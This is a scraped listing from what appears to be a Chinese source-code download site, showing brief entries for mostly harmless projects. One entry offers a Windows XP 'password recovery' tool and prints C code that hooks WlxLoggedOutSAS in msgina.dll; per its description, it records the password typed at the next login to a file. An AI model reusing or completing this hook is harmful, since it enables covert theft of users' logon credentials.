-
JSP源码 聊天留言
JSP源码 聊天留言-JSP source chat messages
- 2023-03-04 05:05:03下载
- 积分:1
-
VC++6.0实现的远程桌面系统,包括客户端和服务端。
VC++6.0实现的远程桌面系统,包括客户端和服务端。-VC++6.0 implementation of the Remote Desktop system, including client and server.
- 2023-03-21 15:45:03下载
- 积分:1
-
this to capture ip packet
this to capture ip packet-this is to capture ip packet
- 2022-09-17 04:00:02下载
- 积分:1
-
这是一个实现k进制的程序,进制是从1到9,可以循环选择
这是一个实现k进制的程序,进制是从1到9,可以循环选择-Realize this is a k-band procedure, M is 1-9, you can choose to cycle
- 2023-02-13 17:10:03下载
- 积分:1
-
利用给定的条件可以实现立体相对的两张影像前方教会解算,同时能够进行精读估计...
利用给定的条件可以实现立体相对的两张影像前方教会解算,同时能够进行精读估计-利用给定的条件可以实现立体相对的两张影像前方教会解算,同时能够进行精读估计
- 2022-02-01 12:18:40下载
- 积分:1
-
简单的网络收藏夹,你可以轻松管理网络收藏,
简单的网络收藏夹,你可以轻松管理网络收藏,-simple network favorites, you can easily manage networks collections,
- 2022-10-28 11:55:04下载
- 积分:1
-
c# gridview的使用案例,还不错
c# gridview的使用案例,还不错-c# gridview the use cases, but also good
- 2022-04-22 04:18:24下载
- 积分:1
-
这是一篇关于一种基于特征的GRID到TIN的转换算法的论文,结构完整。...
这是一篇关于一种基于特征的GRID到TIN的转换算法的论文,结构完整。-This is an article on the characteristics of a GRID-based conversion algorithm to TIN paper, the integrity of the structure.
- 2022-07-21 12:24:04下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
重点fs45x Windows CE驱动程序
focus FS45x windows CE driver
- 2022-04-01 07:10:20下载
- 积分:1